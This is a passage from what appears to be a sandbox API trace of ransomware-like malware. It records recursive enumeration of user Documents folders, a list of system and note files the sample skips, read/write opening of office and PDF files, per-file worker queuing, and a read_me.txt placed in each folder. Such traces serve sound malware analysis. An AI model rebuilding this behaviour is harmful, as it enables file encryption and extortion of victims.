RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e1a48 [0074.159] GetProcessHeap () returned 0x280000 [0074.159] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d975e8 | out: hHeap=0x280000) returned 1 [0074.159] GetProcessHeap () returned 0x280000 [0074.159] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d532e0 [0074.159] GetProcessHeap () returned 0x280000 [0074.159] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e1a48 | out: hHeap=0x280000) returned 1 [0074.160] GetProcessHeap () returned 0x280000 [0074.160] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7dc1440 [0074.166] GetProcessHeap () returned 0x280000 [0074.166] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d532e0 | out: hHeap=0x280000) returned 1 [0074.166] GetProcessHeap () returned 0x280000 [0074.166] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0074.166] GetProcessHeap () returned 0x280000 [0074.166] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc1440 | out: hHeap=0x280000) returned 1 [0074.166] GetProcessHeap () returned 0x280000 [0074.166] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0074.166] GetProcessHeap () returned 0x280000 [0074.166] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0074.166] GetProcessHeap () returned 0x280000 [0074.166] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0074.166] GetProcessHeap () returned 0x280000 [0074.166] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0074.166] GetProcessHeap () returned 0x280000 [0074.167] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0074.167] GetProcessHeap () returned 0x280000 [0074.167] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0074.167] GetProcessHeap () returned 0x280000 [0074.167] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0074.167] GetProcessHeap () returned 0x280000 [0074.167] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0074.167] GetProcessHeap () returned 0x280000 [0074.167] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0074.167] GetProcessHeap () returned 0x280000 [0074.167] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0074.167] GetProcessHeap () returned 0x280000 [0074.167] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0074.167] GetProcessHeap () returned 0x280000 [0074.167] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0074.167] GetProcessHeap () returned 0x280000 [0074.167] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0074.167] GetProcessHeap () returned 0x280000 [0074.167] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0074.167] GetProcessHeap () returned 0x280000 [0074.167] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0074.167] GetProcessHeap () returned 0x280000 [0074.167] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0074.167] GetProcessHeap () returned 0x280000 [0074.167] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0074.167] GetProcessHeap () returned 0x280000 [0074.167] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0074.167] GetProcessHeap () returned 0x280000 [0074.167] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0074.168] GetProcessHeap () returned 0x280000 [0074.168] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0074.168] GetProcessHeap () returned 0x280000 [0074.168] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0074.168] GetProcessHeap () returned 0x280000 [0074.168] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0074.168] GetProcessHeap () returned 0x280000 [0074.168] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x220) returned 0x7dc1440 [0074.168] GetProcessHeap () returned 0x280000 [0074.168] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0074.168] GetProcessHeap () returned 0x280000 [0074.168] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47ca8 | out: hHeap=0x280000) returned 1 [0074.168] GetProcessHeap () returned 0x280000 [0074.168] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d3b0 | out: hHeap=0x280000) returned 1 [0074.168] GetProcessHeap () returned 0x280000 [0074.168] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc1440 | out: hHeap=0x280000) returned 1 [0074.168] GetProcessHeap () returned 0x280000 [0074.168] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d068 | out: hHeap=0x280000) returned 1 [0074.168] SetFilePointerEx (in: hFile=0x7a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.168] WriteFile (in: hFile=0x7a4, lpBuffer=0x7d531d8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d531d8*, lpNumberOfBytesWritten=0x722fd44*=0x100, lpOverlapped=0x0) returned 1 [0074.170] WriteFile (in: hFile=0x7a4, lpBuffer=0x722fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x722fd48*, lpNumberOfBytesWritten=0x722fd44*=0x4, lpOverlapped=0x0) returned 1 [0074.170] GetProcessHeap () returned 0x280000 [0074.170] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc4668 | out: hHeap=0x280000) returned 1 [0074.170] GetProcessHeap () returned 0x280000 [0074.170] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9ccf8 | out: hHeap=0x280000) returned 1 [0074.171] GetProcessHeap () returned 0x280000 [0074.171] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d531d8 | out: hHeap=0x280000) returned 1 [0074.171] CloseHandle (hObject=0x7a4) returned 1 [0074.275] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 3 [0074.275] GetProcessHeap () returned 0x280000 [0074.275] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8af10e0 [0074.275] wnsprintfW (in: pszDest=0x8af10e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\5HD-s7592GQ5SNRk8p\\*") returned 82 [0074.275] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\5HD-s7592GQ5SNRk8p\\*", lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe78e4ad0, ftCreationTime.dwHighDateTime=0x1d4c8f2, ftLastAccessTime.dwLowDateTime=0x16ae7050, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16ae7050, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName=".", cAlternateFileName="")) returned 0x2b26f8 [0074.275] wnsprintfW (in: pszDest=0x8af10e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\5HD-s7592GQ5SNRk8p\\.") returned 82 [0074.275] FindNextFileW (in: hFindFile=0x2b26f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe78e4ad0, ftCreationTime.dwHighDateTime=0x1d4c8f2, ftLastAccessTime.dwLowDateTime=0x16ae7050, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16ae7050, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="..", cAlternateFileName="")) returned 1 [0074.275] wnsprintfW (in: pszDest=0x8af10e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\5HD-s7592GQ5SNRk8p\\..") returned 83 [0074.275] FindNextFileW (in: hFindFile=0x2b26f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb5d46e0, ftCreationTime.dwHighDateTime=0x1d4cb0b, ftLastAccessTime.dwLowDateTime=0x16be4190, ftLastAccessTime.dwHighDateTime=0x1d4cfb3, ftLastWriteTime.dwLowDateTime=0x16be4190, ftLastWriteTime.dwHighDateTime=0x1d4cfb3, nFileSizeHigh=0x0, nFileSizeLow=0x86fd, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="ha9eXoI5IE bhWM2.ods", cAlternateFileName="HA9EXO~1.ODS")) returned 1 [0074.276] wnsprintfW (in: pszDest=0x8af10e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\5HD-s7592GQ5SNRk8p\\ha9eXoI5IE bhWM2.ods") returned 101 [0074.276] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\5HD-s7592GQ5SNRk8p\\ha9eXoI5IE bhWM2.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxpjuqgntcezfomey\\5hd-s7592gq5snrk8p\\ha9exoi5ie bhwm2.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7ac [0074.276] StrStrW (lpFirst="ha9exoi5ie bhwm2.ods", lpSrch="read_me.txt") returned 0x0 [0074.276] StrStrW (lpFirst="ha9exoi5ie bhwm2.ods", lpSrch="autoexec.bat") returned 0x0 [0074.276] StrStrW (lpFirst="ha9exoi5ie bhwm2.ods", lpSrch="desktop.ini") returned 0x0 [0074.276] StrStrW (lpFirst="ha9exoi5ie bhwm2.ods", lpSrch="autorun.inf") returned 0x0 [0074.276] StrStrW (lpFirst="ha9exoi5ie bhwm2.ods", lpSrch="ntuser.dat") returned 0x0 [0074.276] StrStrW (lpFirst="ha9exoi5ie bhwm2.ods", lpSrch="iconcache.db") returned 0x0 [0074.276] StrStrW (lpFirst="ha9exoi5ie bhwm2.ods", lpSrch="bootsect.bak") returned 0x0 [0074.276] StrStrW (lpFirst="ha9exoi5ie bhwm2.ods", lpSrch="boot.ini") returned 0x0 [0074.276] StrStrW (lpFirst="ha9exoi5ie bhwm2.ods", lpSrch="ntuser.dat.log") returned 0x0 [0074.276] StrStrW (lpFirst="ha9exoi5ie bhwm2.ods", lpSrch="thumbs.db") returned 0x0 [0074.276] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 75 [0074.276] QueueUserWorkItem (Function=0x404e00, Context=0x7ac, Flags=0x0) returned 1 [0074.276] FindNextFileW (in: hFindFile=0x2b26f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16ae7050, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x16ae7050, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16ae7050, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0074.276] wnsprintfW (in: pszDest=0x8af10e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\5HD-s7592GQ5SNRk8p\\read_me.txt") returned 92 [0074.276] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\5HD-s7592GQ5SNRk8p\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxpjuqgntcezfomey\\5hd-s7592gq5snrk8p\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x864 [0074.277] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0074.277] CloseHandle (hObject=0x864) returned 1 [0074.277] FindNextFileW (in: hFindFile=0x2b26f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea9f3e70, ftCreationTime.dwHighDateTime=0x1d4d5a2, ftLastAccessTime.dwLowDateTime=0x8dc6f740, ftLastAccessTime.dwHighDateTime=0x1d4c541, ftLastWriteTime.dwLowDateTime=0x8dc6f740, ftLastWriteTime.dwHighDateTime=0x1d4c541, nFileSizeHigh=0x0, nFileSizeLow=0x1275f, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="WMV5qc1E.pdf", cAlternateFileName="")) returned 1 [0074.277] wnsprintfW (in: pszDest=0x8af10e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\5HD-s7592GQ5SNRk8p\\WMV5qc1E.pdf") returned 93 [0074.277] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\5HD-s7592GQ5SNRk8p\\WMV5qc1E.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxpjuqgntcezfomey\\5hd-s7592gq5snrk8p\\wmv5qc1e.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x864 [0074.277] StrStrW (lpFirst="wmv5qc1e.pdf", lpSrch="read_me.txt") returned 0x0 [0074.277] StrStrW (lpFirst="wmv5qc1e.pdf", lpSrch="autoexec.bat") returned 0x0 [0074.277] StrStrW (lpFirst="wmv5qc1e.pdf", lpSrch="desktop.ini") returned 0x0 [0074.277] StrStrW (lpFirst="wmv5qc1e.pdf", lpSrch="autorun.inf") returned 0x0 [0074.277] StrStrW (lpFirst="wmv5qc1e.pdf", lpSrch="ntuser.dat") returned 0x0 [0074.277] StrStrW (lpFirst="wmv5qc1e.pdf", lpSrch="iconcache.db") returned 0x0 [0074.277] StrStrW (lpFirst="wmv5qc1e.pdf", lpSrch="bootsect.bak") returned 0x0 [0074.277] StrStrW (lpFirst="wmv5qc1e.pdf", lpSrch="boot.ini") returned 0x0 [0074.277] StrStrW (lpFirst="wmv5qc1e.pdf", lpSrch="ntuser.dat.log") returned 0x0 [0074.277] StrStrW (lpFirst="wmv5qc1e.pdf", lpSrch="thumbs.db") returned 0x0 [0074.277] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 76 [0074.277] QueueUserWorkItem (Function=0x404e00, Context=0x864, Flags=0x0) returned 1 [0074.277] FindNextFileW (in: hFindFile=0x2b26f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xabcfd7f0, ftCreationTime.dwHighDateTime=0x1d4c90d, ftLastAccessTime.dwLowDateTime=0xc55e5a40, ftLastAccessTime.dwHighDateTime=0x1d4cf2d, ftLastWriteTime.dwLowDateTime=0xc55e5a40, ftLastWriteTime.dwHighDateTime=0x1d4cf2d, nFileSizeHigh=0x0, nFileSizeLow=0x3599, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="wsd0Is2W12FK6wcFiQW.csv", cAlternateFileName="WSD0IS~1.CSV")) returned 1 [0074.277] wnsprintfW (in: pszDest=0x8af10e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\5HD-s7592GQ5SNRk8p\\wsd0Is2W12FK6wcFiQW.csv") returned 104 [0074.278] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\5HD-s7592GQ5SNRk8p\\wsd0Is2W12FK6wcFiQW.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxpjuqgntcezfomey\\5hd-s7592gq5snrk8p\\wsd0is2w12fk6wcfiqw.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8b8 [0074.278] StrStrW (lpFirst="wsd0is2w12fk6wcfiqw.csv", lpSrch="read_me.txt") returned 0x0 [0074.278] StrStrW (lpFirst="wsd0is2w12fk6wcfiqw.csv", lpSrch="autoexec.bat") returned 0x0 [0074.278] StrStrW (lpFirst="wsd0is2w12fk6wcfiqw.csv", lpSrch="desktop.ini") returned 0x0 [0074.278] StrStrW (lpFirst="wsd0is2w12fk6wcfiqw.csv", lpSrch="autorun.inf") returned 0x0 [0074.278] StrStrW (lpFirst="wsd0is2w12fk6wcfiqw.csv", lpSrch="ntuser.dat") returned 0x0 [0074.278] StrStrW (lpFirst="wsd0is2w12fk6wcfiqw.csv", lpSrch="iconcache.db") returned 0x0 [0074.278] StrStrW (lpFirst="wsd0is2w12fk6wcfiqw.csv", lpSrch="bootsect.bak") returned 0x0 [0074.278] StrStrW (lpFirst="wsd0is2w12fk6wcfiqw.csv", lpSrch="boot.ini") returned 0x0 [0074.278] StrStrW (lpFirst="wsd0is2w12fk6wcfiqw.csv", lpSrch="ntuser.dat.log") returned 0x0 [0074.278] StrStrW (lpFirst="wsd0is2w12fk6wcfiqw.csv", lpSrch="thumbs.db") returned 0x0 [0074.278] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 77 [0074.278] QueueUserWorkItem (Function=0x404e00, Context=0x8b8, Flags=0x0) returned 1 [0074.278] FindNextFileW (in: hFindFile=0x2b26f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xabcfd7f0, ftCreationTime.dwHighDateTime=0x1d4c90d, ftLastAccessTime.dwLowDateTime=0xc55e5a40, ftLastAccessTime.dwHighDateTime=0x1d4cf2d, ftLastWriteTime.dwLowDateTime=0xc55e5a40, ftLastWriteTime.dwHighDateTime=0x1d4cf2d, nFileSizeHigh=0x0, nFileSizeLow=0x3599, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="wsd0is2w12fk6wcfiqw.csv", cAlternateFileName="WSD0IS~1.CSV")) returned 0 [0074.278] FindClose (in: hFindFile=0x2b26f8 | out: hFindFile=0x2b26f8) returned 1 [0074.278] wnsprintfW (in: pszDest=0x8af10e0, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\5HD-s7592GQ5SNRk8p\\read_me.txt") returned 92 [0074.278] GetProcessHeap () returned 0x280000 [0074.278] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8af10e0 | out: hHeap=0x280000) returned 1 [0074.278] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 47 [0074.278] GetProcessHeap () returned 0x280000 [0074.278] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8b70030 | out: hHeap=0x280000) returned 1 [0074.279] GetProcessHeap () returned 0x280000 [0074.279] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8b70030 [0074.279] wnsprintfW (in: pszDest=0x8b70030, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\Emjzu37kN6oU\\*") returned 76 [0074.279] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\Emjzu37kN6oU\\*", lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x495da8b0, ftCreationTime.dwHighDateTime=0x1d4c992, ftLastAccessTime.dwLowDateTime=0x16b33310, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16b33310, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName=".", cAlternateFileName="")) returned 0x2b26f8 [0074.279] wnsprintfW (in: pszDest=0x8b70030, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\Emjzu37kN6oU\\.") returned 76 [0074.279] FindNextFileW (in: hFindFile=0x2b26f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x495da8b0, ftCreationTime.dwHighDateTime=0x1d4c992, ftLastAccessTime.dwLowDateTime=0x16b33310, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16b33310, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="..", cAlternateFileName="")) returned 1 [0074.279] wnsprintfW (in: pszDest=0x8b70030, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\Emjzu37kN6oU\\..") returned 77 [0074.279] FindNextFileW (in: hFindFile=0x2b26f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a02c8c0, ftCreationTime.dwHighDateTime=0x1d4cd6a, ftLastAccessTime.dwLowDateTime=0x5e7cacd0, ftLastAccessTime.dwHighDateTime=0x1d4c868, ftLastWriteTime.dwLowDateTime=0x5e7cacd0, ftLastWriteTime.dwHighDateTime=0x1d4c868, nFileSizeHigh=0x0, nFileSizeLow=0x18f98, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="DTJjU8ZUxQJCKzdKZlZ.xls", cAlternateFileName="DTJJU8~1.XLS")) returned 1 [0074.279] wnsprintfW (in: pszDest=0x8b70030, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\Emjzu37kN6oU\\DTJjU8ZUxQJCKzdKZlZ.xls") returned 98 [0074.279] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\Emjzu37kN6oU\\DTJjU8ZUxQJCKzdKZlZ.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxpjuqgntcezfomey\\emjzu37kn6ou\\dtjju8zuxqjckzdkzlz.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8bc [0074.279] StrStrW (lpFirst="dtjju8zuxqjckzdkzlz.xls", lpSrch="read_me.txt") returned 0x0 [0074.279] QueueUserWorkItem (Function=0x404e00, Context=0x8bc, Flags=0x0) returned 1 [0074.279] FindNextFileW (in: hFindFile=0x2b26f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66e941f0, ftCreationTime.dwHighDateTime=0x1d4cc80, ftLastAccessTime.dwLowDateTime=0x54044450, ftLastAccessTime.dwHighDateTime=0x1d4c6d0, ftLastWriteTime.dwLowDateTime=0x54044450, ftLastWriteTime.dwHighDateTime=0x1d4c6d0, nFileSizeHigh=0x0, nFileSizeLow=0xbdd2, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="pheDgsSGr1BYrM2VYAh.doc", cAlternateFileName="PHEDGS~1.DOC")) returned 1 [0074.279] wnsprintfW (in: pszDest=0x8b70030, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\Emjzu37kN6oU\\pheDgsSGr1BYrM2VYAh.doc") returned 98 [0074.279] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\Emjzu37kN6oU\\pheDgsSGr1BYrM2VYAh.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxpjuqgntcezfomey\\emjzu37kn6ou\\phedgssgr1byrm2vyah.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8c0 [0074.279] QueueUserWorkItem (Function=0x404e00, Context=0x8c0, Flags=0x0) returned 1 [0074.279] FindNextFileW (in: hFindFile=0x2b26f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7505d5a0, ftCreationTime.dwHighDateTime=0x1d4ce4c, ftLastAccessTime.dwLowDateTime=0x16ae7050, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16ae7050, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="pzjI", cAlternateFileName="")) returned 1 [0074.279] wnsprintfW (in: pszDest=0x8b70030, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\Emjzu37kN6oU\\pzjI") returned 79 [0074.279] FindNextFileW (in: hFindFile=0x2b26f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16b33310, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x16b33310, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16b33310, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0074.279] wnsprintfW (in: pszDest=0x8b70030, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\Emjzu37kN6oU\\read_me.txt") returned 86 [0074.280] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\Emjzu37kN6oU\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxpjuqgntcezfomey\\emjzu37kn6ou\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, 